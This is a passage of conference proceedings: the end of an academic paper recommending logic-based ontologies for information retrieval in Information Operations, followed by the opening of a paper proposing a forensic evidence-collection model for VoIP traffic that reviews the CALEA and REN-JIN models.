adopting this technology is its status as an emerging technology and therefore we include recommendations for<br />

the development of a prototype system.<br />

Keywords: information operations, knowledge representation, ontology, query language<br />

1. Introduction<br />

Businesses, governments, and military forces are increasingly reliant on the effective management of<br />

vast sources of electronic information. The type of information can be documents, images, maps, or<br />

other formats. These data sources can be used in Information Operations (IO).<br />

McCrohan (McCrohan 1998) defines IO as “actions taken to create an information gap in which we<br />

possess a superior understanding of a potential adversary’s political, economic, military, and<br />

social/cultural strengths, vulnerabilities, and interdependencies than our adversary possesses of us”.<br />

All institutions that rely on information are facing increasing exposure to strategic information-based<br />

actions, and need to consider systems security. Most national defence and security organisations<br />

regard IO as both a defensive and an offensive tool, and some commercial institutions are starting to<br />

recognise the value of IO. In any competitive environment, an institution has to protect their strategies<br />

from competitors and gather information regarding their competitors’ objectives and plans. IO include<br />

competitive intelligence, security against the efforts of competitors, the use of competitive deception,<br />

and the use of psychological operations. (McCrohan 1998).<br />

The aim of an efficient information retrieval system is to support institutions in planning IO. Information<br />

has to be presented for processing by computers in a knowledge system such that information can be<br />

retrieved and conclusions can be drawn from existing knowledge. Information should be classified in a<br />

way that it can be searched and extracted effectively.<br />

We present the main decisions required in the investigation and design of a knowledge system that<br />

can be used to extract relevant and complete knowledge for the planning and execution of IO and<br />

give a motivation for our main recommendation: the use of logic-based ontologies in a knowledge<br />

system for IO.<br />

151


Louise Leenen et al.<br />

2. Intelligent knowledge retrieval methods and technologies<br />

We describe appropriate technologies for intelligent search and retrieval of information over a range<br />

of different sources and types. The operative word here is intelligent, focussing on methods that will<br />

ensure maximum recall with a high level of fidelity. In other words, the aim is to get as close as is<br />

currently feasible to the ideal situation in which all and only relevant information will be returned. In<br />

order to do so, it is necessary to be more precise in deciding what it means for information to be<br />

relevant. The most important step in this direction is the distinction between syntactic and semantic<br />

relevance.<br />

Syntactic relevance refers to search based on the syntactic structure of the entities to be searched,<br />

while semantic relevance is concerned with the underlying meaning of the syntactic objects being<br />

represented. Search based on syntactic relevance can be better or worse depending on some<br />

flexibility built into the search mechanisms, but this provides only for a very limited and restricted form<br />

of intelligence. To be seen as performing intelligent search in any true sense of the word, it is<br />

necessary to make use of some version of semantic relevance.<br />

The basic assumption is that information can be accessed electronically. Information in this sense is<br />

defined very broadly: it can refer to data entries stored in database systems, or in more sophisticated<br />

structures. It can also refer to electronic documents, or an image in any of the known formats, or any<br />

one of the other numerous resources that can be stored electronically. The main reason why it is<br />

possible to allow for such a broad definition is that the methods detailed in this survey allow for a<br />

clean separation between information, the structures employed to store the information, and the<br />

methods used to access the information.<br />

2.1 Query languages<br />

2.1.1 Boolean combinations of keywords<br />

Keyword search is an established technology (Kalyanpur et al. 2006). The simplest form is when a list<br />

of keywords is used with the intention to locate information containing all keywords in the list. More<br />

flexible keyword searches can be done by using Boolean operators such as AND, OR and NOT. This<br />

kind of query language can not be used in database-style structures. A second difficulty is that<br />

searches become complex when there are large numbers of keyword hits.<br />

2.1.2 Logic-based query languages<br />

The use of logic-based languages is pervasive in database systems. It has its origins in languages<br />

such as SQL and later extensions such as the query languages for Datalog (Ceri et al. 1989) and<br />

logic programming (Lloyd 1987). These languages are all fragments of first-order logic (Ben-Ari 2008).<br />

In addition to the Boolean operators discussed in the previous section, these query languages also<br />

allow for the use of variables, existential quantification (exists), universal quantification (for all), and<br />

function symbols, and combinations of these additions in manner reminiscent of the recursive<br />

definition in the previous section. This allows us to express complex queries such as:<br />

“Find all countries in Africa with a per capita income of at most $X, and with a military<br />

style government, or where there is no adherence to human rights”.<br />

The main advantages of these types of query languages are that they allow for much more complex<br />

queries, can be used to express queries about concepts as well as individuals, and are applicable to<br />

information contained in database-style structures as well as electronic documents. However, the<br />

processing of such queries can be very complex, and is directly related to the complexity of queries. It<br />

is good practice to limit the expressivity of a chosen query language to precisely what is necessary in<br />

order to maximise the efficiency of query processing.<br />

2.2 Information types<br />

It is useful to assume that information is tagged with the relevant components to be matched with<br />

queries. This assumption enables us to reduce the original question to a decision of how a piece of<br />

information should be tagged. A tag is a keyword associated with a piece of information. The purpose<br />

of a tag is to describe an item and to enable an electronic search to find it .<br />

152


Louise Leenen et al.<br />

We distinction between using text or keywords as tags, and between information contained in<br />

database-style structures and electronic documents viewed as information.<br />

2.2.1 Text as tags<br />

In the case of information contained in database-style structures, the only practical option is to view<br />

the information itself as its own tag. In the case of electronic documents, the simplest form of tagging<br />

is the brute force approach of using the raw text contained in a document. In a sense the document is<br />

tagged with all of its textual content. The advantage of such an approach is that it is relatively simple<br />

to implement, but this simplicity is associated with high levels of inaccuracy. In particular, this<br />

approach is bound to lead to many false positives and it does not guarantee that all relevant<br />

documents will be located. The main problem is that this is a purely syntactic approach. There is no<br />

attempt to tag documents with keywords related to the meaning of the document, and there is<br />

therefore no guarantee that the tags will be truly relevant to the content of the document.<br />

2.2.2 Keywords as tags<br />

In contrast with using text as tags, the practice of tagging information with appropriate keywords<br />

allows for a much more flexible approach. The goal is to tag documents with keywords that are clearly<br />

relevant to the meaning of the document, ideally to tag documents with all and only the relevant<br />

keywords. The primary issue to be resolved here is to how to decide on the relevant keywords.<br />

Tagging can take one of three forms: Manual tagging, semi-automated tagging, or automated tagging<br />

(Buitelaar, Cimiano 2008; Buitelaar, Magnini 2005). Current techniques are relatively good at picking<br />

out keywords related to concepts and individuals, but much work still needs to be done regarding<br />

keywords related to relationships between concepts or individuals.<br />

Manual tagging is a good starting point however, using only manual tagging is usually not feasible,<br />

due to factors such as time constraints and the availability of domain experts. A better approach is to<br />

interleave processes for manual, semi-automated and automated tagging of documents. Automated<br />

tagging is faster but not as accurate, whereas semi-automated tagging provides better results, but is<br />

more time consuming to set up. Keep in mind that the results obtained even from manual tagging are<br />

only as good as the knowledge applied by the person(s) performing the tagging.<br />

The good news is that tagging method lends itself to an incremental approach. One can start with a<br />

fairly course-grained tagging methodology, and refine this increasingly over time.<br />

2.3 Information retrieval methods<br />

2.3.1 Direct retrieval<br />

Direct retrieval is concerned with methods for extracting information stored explicitly in as efficient a<br />

manner as possible. This is the kind of retrieval based on indexing techniques that one would obtain<br />

from traditional database systems and from keyword searches based on syntactic relevance (Gray,<br />

Reuter 1992; Kroenke 1997). In the case of direct document retrieval, keywords in a query are<br />

identified and are matched directly with the keywords used to tag the document.<br />

Direct retrieval techniques are firmly established, and are able to deal efficiently with huge amounts of<br />

information. The only drawback is the restriction on the type of information to be extracted: it has to be<br />

stored explicitly in some form.<br />

2.3.2 Indirect retrieval<br />

A more sophisticated approach is to employ some kind of indirect retrieval where the task is to match<br />

the keywords identified in the query not just with the exact keywords with which a document is tagged,<br />

but also with related keywords. The hard part is to determine what constitutes being related. Standard<br />

approaches to indirect document retrieval are mostly still syntax-based:<br />

The use of synonyms using resources such as WordNet (http://wordnet.princeton.edu/)<br />

(Fellbaum 1998).<br />

153


Louise Leenen et al.<br />

Lemmatisation, the process of grouping together the different inflected forms of a word so they<br />

can be analysed as a single item (Brown 1993). For example, the verb “to walk” may appear as<br />

“walk”, “walked”, “walks”, “walking”. The base form, “walk”, is called the lemma of the word.<br />

Stemming, which is closely related to lemmatisation but operates on a single word without<br />

contextual information. Related words should map to the same stem, but the stem does not have<br />

to be a valid root.<br />

A more nuanced version of indirect document retrieval involves structures able to capture and<br />

represent sophisticated relationships between entities. The more sophisticated version of indirect<br />

retrieval employs methods for performing inference of some kind. Indirect retrieval also includes<br />

information that can be inferred implicitly from what is stored explicitly.<br />

The most appropriate technology able to deal with indirect information retrieval is that based on<br />

ontologies (Staab, Studer 2004). The following definition of an ontology is taken from Wikipedia<br />

(http://en.wikipedia.org/wiki/Ontology_(information_science)): “an ontology is a formal representation<br />

of a set of concepts within a domain and the relationships between those concepts. It is used to<br />

reason about the properties of that domain, and may be used to define the domain”.<br />

In addition to facilitating the hierarchical structuring of information from a domain of discourse,<br />

ontologies also provide the means to impose a whole variety of other constraints, which makes it a<br />

very powerful method for representing concepts, individuals, and the relationships between them. The<br />

use of logic-based ontologies is particularly apt, since it provides the means for employing powerful<br />

and efficient mechanisms for performing inference.<br />

2.4 Ontologies and ontology-based engineering<br />

In the past fifteen years, advances in technology have ensured that access to vast amounts of data is<br />

no longer a significant problem. Paradoxically, this abundance of data has lead to a problem of<br />

information overload, making it increasingly difficult to locate relevant information. The technology of<br />

choice at present is keyword search, although many argue that this is already delivering diminishing<br />

returns, as Figure 1 below by Nova Spivack (Spivack 2007) indicates. Spivack illustrates how keyword<br />

search is becoming less effective as the Web increases in size. The broken line shows that the<br />

productivity of keyword search has reached a plateau and its efficiency will decrease in future, while<br />

the dotted line plots the expected growth of the Web.<br />

Any satisfactory solution to this problem will have to involve ways of making information machineprocessable,<br />

a task which is only possible if machines have better access to the semantics of the<br />

information. It is here that ontologies play a crucial role. Roughly speaking, an ontology structures<br />

information in ways that are appropriate for a specific application domain, and in doing so, provides a<br />

way to attach meaning to the terms and relations used in describing the domain. A more formal, and<br />

widely used definition, is that of Grüber (Grüber 1993) who defines an ontology as a formal<br />

specification of a conceptualisation.<br />

The importance of this technology is evidenced by the growing use of ontologies in a variety of<br />

application areas, and is in line with the view of ontologies as the emerging technology driving the<br />

Semantic Web initiative (Berners-Lee et al. 2001). The construction and maintenance of ontologies<br />

greatly depend on the availability of ontology languages equipped with a well-defined semantics and<br />

powerful reasoning tools. Fortunately there already exists a class of logics, called Description Logics<br />

(DLs), that provide for both, and are therefore ideal candidates for ontology languages (Baader et al.<br />

2003).<br />

The need for sophisticated ontology languages was already clear fifteen years ago, but at that time,<br />

there was a fundamental mismatch between the expressive power and the efficiency of reasoning that<br />

DL systems provided, and the expressivity and the large knowledge bases that ontologists needed.<br />

Through the basic research in DLs of the last fifteen years, this gap between the needs of ontologists<br />

and the systems that DL researchers provide has finally become narrow enough to build stable<br />

bridges. In fact, the web ontology language OWL 2.0, which was accorded the status of a World Wide<br />

Web Consortium (W3C) recommendation in 2009, and is therefore the official Semantic Web ontology<br />

language, is based on an expressive DL (http://www.w3.org/TR/owl2-overview/).<br />

154


Louise Leenen et al.<br />

There is growing interest in the use of ontologies and related semantic technologies in a wide variety<br />

of application domains. Arguably the most successful application area in this regard is the biomedical<br />

field (Hahn, Schulz 2007; Wolstencroft et al. 2005 ). Some of the biggest breakthroughs can be traced<br />

back to the pioneering work of Horrocks (Horrocks 1997) who developed algorithms specifically<br />

tailored for medical applications. Recent advances have made it possible to perform standard<br />

reasoning tasks on large-scale medical ontologies such as SNOMED CT - an ontology with more than<br />

300 000 concepts and more than a million semantic relationships - in less than half an hour; a feat<br />

that would have provoked disbelief ten years ago (Suntisrivaraporn et al. 2007). However, a number<br />

of obstacles still remain before the use of ontologies can be regarded as having reached the status of<br />

an established technology: mainly these are issues relating to conceptual modeling and data usage.<br />

Figure 1: Productivity of keyword search<br />

2.4.1 Conceptual modeling<br />

There are currently no firmly established conceptual modelling methodologies for ontology<br />

engineering. Although a variety of tools exist for ontology construction and maintenance (Kalyanpur et<br />

al. 2006; Sirin et al. 2007; Protégé 2009) they remain accessible mainly to those with specialised<br />

knowledge about the theory of ontologies. One way of dealing with this problem is to design ontology<br />

languages that are as close to natural language as possible, while still retaining the unambiguous<br />

semantics of a formal language (Schwitter et al. 2007). A related approach is to use unstructured text<br />

to automatically identify concepts and relationships in application domains, and in doing so contribute<br />

to the semi-automated construction of ontologies (Buitelaar, Cimiano 2008).<br />

Another major obstacle is that, while most tools for ontology construction and maintenance assume a<br />

static ontology, the reality is that ontologies are dynamic entities, continually changing over time for a<br />

variety of reasons. This has long been identified as a problem, and ontology dynamics is currently<br />

seen as an important research topic (Baader et al. 2005; Lee et al. 2006).<br />

2.4.2 Data usage<br />

Assuming that the problems relating to conceptual modeling have been solved, and that it is possible<br />

to construct and maintain high-quality ontologies, a number of stumbling blocks related to data usage<br />

still remain.<br />

155


Louise Leenen et al.<br />

The main problem is that most available data are currently in the form of unstructured or semistructured<br />

text, or can be found in traditional relational database systems. The rich conceptual<br />

structures provided by ontologies are therefore of little use unless ways can be found to automate, or<br />

semi-automate, the process of populating ontologies with this data. Regarding data in textual form,<br />

there have been some recent attempts to perform semi-automated instantiation of ontologies from text<br />

(Buitelaar, Cimiano 2008; Williams, Hunter 2007). With regards to the data found in database<br />

systems, it is necessary to employ data coupling - finding ways of linking the data residing in<br />

database systems to the ontologies placed on top of such systems (Calvanese et al. 2006). This<br />

challenge is currently being met by tools for Ontology Based Data Access (OBDA) (Rodriguez-Muro<br />

et al. 2008).<br />

Once an ontology is populated, it becomes possible to use it as a sophisticated data repository to<br />

which complex queries can be posed, at least in principle. In practice, at least two challenges remain.<br />

The first is to perform query answering efficiently, a topic of ongoing research (Calvanese et al. 2007).<br />

The second is to go beyond purely deductive reasoning to answer queries and to be more proactive.<br />

A good example of this type of reasoning occurs during medical diagnosis, which is an instance of a<br />

form of reasoning technically known as abduction (Elsenbroich et al. 2007).<br />

2.5 Tools for user support<br />

There is a danger that the complexity of the techniques discussed above will pose a barrier to their<br />

general uptake. Most techniques incorporate some level of familiarity with technical issues such as<br />

formal logic languages, which can be disconcerting for the more casual user. We discuss two classes<br />

of methods used to bridge the gap between users and the technology.<br />

2.5.1 Controlled natural language<br />

A controlled natural language is a suitable fragment of a natural language, usually obtained by<br />

restricting the grammar and vocabulary. This is done primarily to ensure that there is no ambiguity in<br />

the interpretation. It can also assist with a reduction in complexity. Controlled natural languages can<br />

usually be mapped to existing formal languages, typically a fragment of first-order logic.<br />

For our purposes the translation will be to a suitable DL used to represent ontologies. Because of this<br />

mapping, controlled natural languages have a formal semantics, making them suitable as knowledge<br />

representation languages, able to support inference tasks such as query answering. The advantage<br />

of using controlled natural languages instead of their logic counterparts is that it appears to the user<br />

as if a natural language is being used. Work on controlled natural language most relevant for logicbased<br />

ontologies include Manchester OWL Syntax (Horrocks et al. 2006), Sydney OWL Syntax (SOS)<br />

(Rodriguez-Muro et al. 2008 ), and the Rabbit language (Hart et al. 2008 ).<br />

2.5.2 Contextual navigation<br />

This subsection is concerned with the principles of the design and development of an intelligent query<br />

interface (Catarci et al. 2004). The interface is intended to support users in formulating queries which<br />

best capture their specific information needs. The distinctive part of this approach is the use of an<br />

ontology as the support for the intelligence contained in the query interface. The user can exploit the<br />

vocabulary in the ontology to formulate the query. Using the information contained in the ontology, the<br />

system is able to guide the user to express their intended query more precisely. Queries can be<br />

specified through an iterative refinement process supported by the ontology through contextual<br />

navigation. In addition, users may discover new information about the domain without explicit<br />

querying, but through the subparts of a query, using classification. Work on contextual navigation is<br />

not restricted to logic-based ontology languages, but it does depend on an underlying knowledge<br />

representation language with an associated formal reasoner. In the context of ontologies, it has led to<br />

the development of a query tool as part of the <strong>European</strong> Union funded SEWASIE project (SEmantic<br />

Webs and AgentS in Integrated Economies) (http://www.sewasie.org/).<br />

3. Research methodology<br />

We first conducted a needs analysis with our client with the aim of identifying their expectations and<br />

requirements, followed by a problem analysis where the client’s domain was studied and<br />

recommendations in terms of the most appropriate technologies for their applications were made.<br />

156


3.1 Needs analysis<br />

Louise Leenen et al.<br />

Needs analysis is an interactive process with the aim of extracting information from the client to<br />

understand their needs and expectations. It involves asking specific questions to the client and<br />

recording and documenting their responses. Usually several interactions are required before this<br />

process is completed.<br />

The type of questions that were posed to our client can broadly be defined as:<br />

What is the reality of your domain?<br />

What do you do?<br />

What are the challenges you experience?<br />

What are your expectations from an information operation?<br />

The aim of these questions is to identify the type of IO the client wants to execute, the range of<br />

required information sources and how information should be interpreted. It should also point to the<br />

type of information repositories that will be needed, and how they should be populated and updated.<br />

As a result we compiled an extensive set of derived questions. These questions depict the scope of<br />

information required by our client for an operation.<br />

3.2 Problem analysis<br />

In this phase we analysed the various methodologies and technologies available for an appropriate<br />

knowledge representation system for the client’s domain. A basic assumption is that all information<br />

can be accessed electronically and includes documents, images or maps, and data stored in<br />

database systems, or in more sophisticated structures.<br />

The following three primary questions were applied to the client’s domain:<br />

In which way will a user extract information, i.e. which query language is to be used?<br />

How will the type of information to be extracted be matched with the query?<br />

Which method will be used to retrieve the information contained in the query from the information<br />

repository?<br />

A formal problem statement was written that includes strategic long term direction and objectives.<br />

3.3 Findings<br />

The main recommendation is that a logic-based ontology is to be used as the underlying technology<br />

for the retrieval system. The adoption of logic-based ontologies as underlying formalism for a<br />

knowledge representation system has a number of advantages.<br />

The semantics of such an ontology is<br />

unambiguous;<br />

it facilitates intelligent search;<br />

it provides an optimal tradeoff between expressivity and complexity; and<br />

it can yield optimal recall of information.<br />

The risk of adopting this technology is its status as an emerging technology. Its impressive progress in<br />

the biomedical domain lends strong support for its adoption in the IO domain, but there are presently<br />

no off-the-shelf ontologies available for IO.<br />

The development of such an ontology that is both reliable and complete is a highly complex research<br />

endeavour. With this in mind, we recommend an incremental approach to the adoption of this<br />

technology in order to realise the long term strategic objectives outlined earlier.<br />

The developmental recommendations for a prototype system are:<br />

Define a suitable sub-domain for initial development. Our client’s domain is vast and complex.<br />

The recommendation is to start with a smaller, focused domain.<br />

157


Louise Leenen et al.<br />

The documents in the domain should be tagged. The choice of tags will depend on the ontology<br />

and the concepts used in existing information sources.<br />

An ontology-based search facility should be developed.<br />

An appropriate query language should be decided on in conjunction with a suitable user interface.<br />

which may involve controlled natural language or contextual navigation, or both.<br />

The evaluation of a prototype system will determine the extension of the system into a comprehensive<br />

knowledge system.<br />

4. Conclusion<br />

In this paper we have focused on the technologies relevant for intelligent information retrieval for<br />

Information Operations. Conceptually, the survey is decomposed into three parts:<br />

Choices for a suitable query language;<br />

Type of information to be extracted;<br />

Methods employed for information retrieval.<br />

Supplementary to this is a discussion on ontologies, as well as on tools for supporting users of<br />

systems for intelligent retrieval.<br />

Our main conclusion is that the use of logic-based ontologies has the potential to be of enormous<br />

benefit in systems demanding true intelligent retrieval. However, it has to be taken into account that<br />

this is an emerging technology that will still require a substantial amount of research in order to reach<br />

maturity. The good news is that it is possible to approach matters in an incremental fashion,<br />

developing an information repository based on more traditional methods, and gradually increasing its<br />

sophistication.<br />

References<br />

The Protégé Ontology Editor. Available: http://protege.stanford.edu/. [2009, January].<br />

Baader, F., Calvanese, D., McGuinness, D., Nardi, D. & Patel-Schneider, P. (2003) The Description Logic<br />

Handbook: Theory,Implementation, and Applications, Cambridge University Press.<br />

Baader, F., Lutz, C., Milicic, M., Sattler, U. & Wolter, F. (2005) "Integrating Description Logics and Action<br />

Formalisms: First results", AAAI 05.<br />

Ben-Ari, M. (2008) MathematicalLlogic for Computer Science, Springer.<br />

Berners-Lee, T., Hendler, J. & Lassila, O. (2001), "The semantic web", Scientific American, Vol. 284, No. 5.<br />

Brown, L. (1993) The New Shorter Oxford English Dictionary on Historical Principals, Vol 1, Oxford University<br />

Press.<br />

Buitelaar, P. & Cimiano, P. (2008) "Ontology Learning and Population: Bridging the Gap Between Text and<br />

Knowledge", Frontiers in Artificial Intelligence and Applications, Vol. 167.<br />

Buitelaar, P. & Magnini, B. (2005) "Ontology Learning From Text: Methods, Evaluation and Applications",<br />

Frontiers in Artificial Intelligence and Applications, Vol. 123.<br />

Calvanese, D., De Giacomo, G., Lembo, D., Lenzerini, M., Poggi, A. & Rosati, R. (2006) "Linking Data to<br />

Ontologies: The Description Logic DL-LiteA.", The 2 nd workshop on OWL.<br />

Calvanese, D., Giacomo, G.D., Lembo, D., Lenzerini, M. & Rosati, R. (2007) "Tractable Reasoning and Efficient<br />

Query Answering in Description Logics: The DL-Lite Family.", Journal of Automated Reasoning, Vol. 39, No.<br />

3.<br />

Catarci, T., Dongilli, P., Mascio, T.D., Franconi, E., Santucci, G. & Tessaris, S. (2004) "An Ontology Based Visual<br />

Tool for Query Formulation Support", ECAI 2004.<br />

Ceri, S., Gottlob, G. & Tanca, L. (1989) "What you always wanted to know about Datalog (and never dared to<br />

ask.)", IEEE Transactions on Knowledge and Data Engineering, Vol. 1, No. 1.<br />

Elsenbroich C., Kutz O. & Sattler, U. (2007) "A Case for Abductive Reasoning over Ontologies", OWLED.<br />

Fellbaum, C. (1998) WordNet: An Electroni Lexical Database, MIT Press.<br />

Gray, J. & Reuter, A. (1992), Transaction Processing: Concepts and Techniques, Morgan Kaufmann Publishers.<br />

Grüber, T. (1993) "A translation approach to portable ontology specifications", Knowledge Acquisition, Vol. 5.<br />

Hahn, U. & Schulz, S. (2007) "Ontological foundations for biomedical sciences", Artificial Intelligence in Medicine,<br />

Vol. 39, No. 3.<br />

Hart, G., Dolbear, C. & Johnson, M. (2008) "Rabbit: Developing a Control Natural Language for Authoring<br />

Ontologies", 5th <strong>European</strong> Semantic Web <strong>Conference</strong>.<br />

Horrocks, I. (1997) Optimising Tableaux Decision Procedures for Description Logics, University of Manchester.<br />

Horrocks, M., Drummend, N., Goodwin, J., Rector, A., Stevens, R. & Wand, H. (2006) "The Manchester OWL<br />

Syntax", OWL Experiences and Directions Workshop.<br />

Kalyanpur, A., Parsia, B., Sirin, E., Cuenca-Grau, B. & Hendle, J. (2006) "Swoop: A Web Ontology Editing<br />

Browser", Journal of Web Semantics, Vol. 4, No. 2).<br />

158


Louise Leenen et al.<br />

Kroenke, D.M. (1997) Database Processing: Fundamentals, Design, and Implementation, Prentice-Hall.<br />

Lee, K., Meyer, T., Pan, J.Z. & Booth, R. (2006) "Finding Maximally Satisfiable Terminologies for the Description<br />

Logic ALC", Proceedings of AAAI 06.<br />

Lloyd, J.W. (1987) Foundations of logic programming, Springer-Verlag, New York.<br />

McCrohan, K.F. (1998) "Competitive Intelligence: Preparing for the Information War", Long Range Planning, Vol.<br />

31, No. 4.<br />

Rodriguez-Muro, M., Lubyte, L. & Calvanese, D. (2008) "Realizing Ontology Based Data Access: A plug-in for<br />

protoge", ICDE Workshops.<br />

Schwitter, R., Cregan, A. & Meyer, T. (2007) "Sydney OWL Syntax - towards a Controlled Natural Language<br />

Syntax for OWL 1.1.", OWL Experiences and Directions, Third International Workshop.<br />

Sirin, E., Parsia, B., Grau, B.C., Kalyanpur, A. & Katz, Y. (2007) "Pelet: A practical OWL-DL reasoner", Journal of<br />

Web Semantics, Vol. 5, No. 2.<br />

Spivack, N. (2007). Available:<br />

http://novaspivack.typepad.com/nova_spivacks_weblog/2007/03/beyond_keyword_.html. [2010, November<br />

2010]<br />

Staab, S. & Studer, R. (eds) (2004) Handbook on Ontologies, Springer.<br />

Suntisrivaraporn, B., Baader, F., Schulz, S. & Spackman, K. (2007) "Replacing SEP-Triplets in SNOMED CT<br />

using Tractable Description Logic Operators", AIME.<br />

Williams, M. & Hunter, A. (2007) "Harnessing ontologies for argument-based decision-making in breast cancer",<br />

International <strong>Conference</strong> for Tools with Artificial Intelligence.<br />

Wolstencroft, K., Brass, A., Horrocks, I., Lord, P., Sattler, U., Stevens, R. & Turi, D. (2005) "A little semantic web<br />

goes a long way in biology", International Semantic Web <strong>Conference</strong>.<br />

159


CAESMA – An On-Going Proposal of a Network Forensic<br />

Model for VoIP traffic<br />

Jose Mas y Rubi, Christian Del Carpio, Javier Espinoza, and Oscar Nuñez Mori<br />

Pontificia Universidad Catolica del Peru, Lima, Peru<br />

jlmasyrubi@pucp.edu.pe<br />

delcarpio.christian@pucp.edu.pe<br />

jmespino@pucp.edu.pe<br />

oscar.nunez@pucp.pe<br />

Abstract: In the near future, service convergence will be a reality, which presents us with a possible misuse<br />

problem of these technologies. One of these services is Voice over IP (VoIP), which provides the phone<br />

communication services in this scheme. Currently VoIP is a very popular technology, and could be use by<br />

malicious attackers related to informatics crimes, to perform their illicit actions, which will be difficult to track<br />

because of IP network’s nature. Because of this, our approach is to achieve a preliminary analysis to create a<br />

forensic model for detection and tracing of VoIP traffic, which will allow us to make an adequate evidence<br />

recollection which could be used by the police authorities.<br />

Keywords: network forensics, forensic model proposal, voice over IP<br />

1. Introduction<br />

Due to the inadequate use of the telephone service in converged networks, mainly generated by<br />

malicious attackers who misuse this technology, it becomes necessary to identify the security gaps in<br />

this network and provide a possible solution.<br />

Therefore, previous to the development of this article we analyze the security gaps (Annex 1), and<br />

based on that analysis we perceive like a potential security problem “the user identification for the<br />

calls originated from internet (VoIP)”, due to the lack of user data validation at the registration process<br />

when the named source is use it.<br />

This problem hinders the proper evidence recollection from the authorities, leading to the fact that<br />

many times this acts stay unpunished due to the lack of possible identification of the attackers.<br />

This document propose a preliminary data recollection model for a posterior forensic analysis in a<br />

VoIP network environment for calls generated from the Internet, based on the network architecture<br />

shown in Figure 1. For our analysis, we will rely on the Digital Forensics Research Workshop<br />

(DFRWS) model, which is a general model for a proper digital forensic analysis.<br />

Figure 1: Network architecture<br />

160


Jose Mas y Rubi et al.<br />

As we can see within the network architecture, the originating point of the calls for our analysis will be<br />

the Internet cloud, the establishment path and signaling is the following:<br />

a. Connection to the SIP server, which contains the database of all the users in the VoIP network.<br />

b. After the validation of the destination user, which is part of the VoIP network, the SIP server sends<br />

the corresponding signaling for call establishment with the VoIP network.<br />

The rest of the article is organized as follows: In section II we introduce all the information related to<br />

our work, which offers a clear base about the DFRWS general analysis model and the technology<br />

behind VoIP service. In section III we describe the CALEA and REN-JIN models, offering a theoretical<br />

basis and techniques that will allow us to understand in a better way the proposal of this work. In<br />

section IV we develop a comparative analysis between CALEA and REN-JIN models, taking into<br />

account the DFRWS general model as study base for both of them. In section V we propose a new<br />

forensic model which is the result of the previous analysis, and we study its preliminary architecture<br />

and basic operation. Finally we present our conclusions and possible future works.<br />

2. Theoretical basis<br />

To start our investigation, it is necessary that we study our referential general model for forensic<br />

analysis of the DFRWS and the technical concepts of the VoIP technology, in order to contextualize<br />

our analysis in a suitable environment.<br />

2.1 Digital Forensics Research Workshop (DFRWS) model<br />

Several forensic investigators have analyzed multiple digital forensic models. Within those models,<br />

they found that the DFRWS model is rigid and linear but is particularly suitable where necessary<br />

investigative activities are well-understood (Ray 2007). Also, they highlight the fact that in the<br />

development of this model, for the first time, academic entities were involved, which didn’t happen<br />

with other forensic models in its time. All other models were more focused on guidelines established<br />

by law enforcement (Reith 2002).<br />

Therefore, we choose the DFRWS model because allows a comprehensive approach and is more<br />

goal-oriented to the objectives of this academic article. To proceed, we show the step sequence<br />

followed by this model for an adequate forensic analysis:<br />

Table 1: Steps for a digital forensic analysis (DFRWS 2001)<br />

2.2 Voice over IP (VoIP)<br />

The important point to keep in mind about the VoIP technology is concerning the shared information<br />

between the terminal devices and the data itself, which will enable us to discriminate the calls and<br />

their types. Those elements are presented in the following list (Pelaez 2010):<br />

a) Terminal device information:<br />

161


Numbers called.<br />

Source and destination IP addresses.<br />

IP geographical localization.<br />

Incoming calls.<br />

Start/end times and duration.<br />

Voice mail access numbers.<br />

Call forwarding numbers.<br />

Incoming/outgoing messages.<br />

Access codes for voice mail systems.<br />

Contact lists.<br />

Jose Mas y Rubi et al.<br />

b) VoIP data:<br />

Protocol type.<br />

Configuration data.<br />

Raw packets.<br />

Inter-arrival times.<br />

Variance of inter-arrival times.<br />

Payload size.<br />

Port numbers.<br />

Codecs.<br />

The Session Initiation Protocol (SIP) is an important part of the VoIP network communication. SIP is<br />

an IETF standard for IP multimedia conferences. SIP is an application layer control protocol use to<br />

create, modify and terminate session with one or more participants. These sessions include internet<br />

multimedia conferences, internet phone calls and multimedia distribution. The signaling allows the<br />

transportation of call information across the network boundaries. The session management provides<br />

the ability to control the attributes of an end-to-end call (Fernandez 2007).<br />

3. Related works<br />

In our preliminary investigation, we searched different models that could adapt to the DFRWS general<br />

model, and among the most outstanding models we found REN-JIN and CALEA, which will be<br />

describes in the following subsections.<br />

3.1 CALEA model<br />

Government Surveillance is a network forensic special case. Communications Assistance for Law<br />

Enforcement Act (CALEA) is another term use for this electronic surveillance. This means that is<br />

legally valid to introduce an agent inside a communication channel to intercept information, without<br />

altering it (Scoggins 2004).<br />

The wiretapping installation is based on the wire modem’s MAC address, so it can be use for the data<br />

or digital voice connections. This characteristic is controlled by the command interface, intercepted<br />

cable, which requires a MAC address, an IP address and an UDP port number as their parameters<br />

(Scoggins 2004).<br />

When it is active, the router examines each packet with the desirable MAC addresses and when finds<br />

a match to one of those addresses (either from the origin or destination terminal device), a copy is<br />

send to the server, specifying the IP address and port number (Scoggins 2004).<br />

Figure 2 shows how the components of CALEA model (Delivery Function, Collection Function and<br />

Law Enforcement Agency) integrate with a VoIP system providing a transparent lawful interception.<br />

Calls are routed through an access gateway that hides any intercepts in place (Pelaez 2007).<br />

162


Figure 2: CALEA forensic model (Pelaez 2007)<br />

Jose Mas y Rubi et al.<br />

Telephone interception can be classified in two categories:<br />

Call detail: Send and receive call details from a subscriber, that will pass to LEA. The generated call<br />

registration created from signaling message can be very valuable in criminal investigations. The<br />

signaling message contains data from phone calls, not about the content of the conversation.<br />

Therefore, the recollection and analysis of signaling messages cannot be subject to the same legal<br />

restrictions as recording voice conversations (Moore 2005).<br />

Call content: It is the real content of the call that we pass to LEA. The suspect must not detect the<br />

mirror, so this element must be produced inside the network and not in the subscriber link. Also this<br />

mirror must not be detectable by any change in time, availability characteristics or operation (Pelaez<br />

2007).<br />

In order that LEA take advantage of the call content without the subscriber knowledge of any change,<br />

all the calls must pass through a device that duplicate the content and then pass it to the agency<br />

(Pelaez 2007).<br />

3.2 REN–JIN model<br />

This model, conceived by Wei Ren and Hai Jin, is designed to capture the network traffic and to<br />

register the corresponding data. This network forensic system has 4 elements (Pelaez 2006):<br />

Network Forensics Server, which integrates the forensic data and analyzes it. It also guides the<br />

network packet filter and captures the behavior of the Network Monitor. It can request the<br />

activation of an investigation program in the Network Investigator has an answer to a sensitive<br />

attack.<br />

Network Forensics Agents, is responsible of data recollection, data extraction and data secure<br />

transportation. These agents are distributed around the network and the monitored hosts.<br />

Network Monitor, is a packet and network traffic capture machine.<br />

Network Investigator, is the network surveillance machine. It investigates a target when the server<br />

gives the command. It activates a real time response program for each network intrusion.<br />

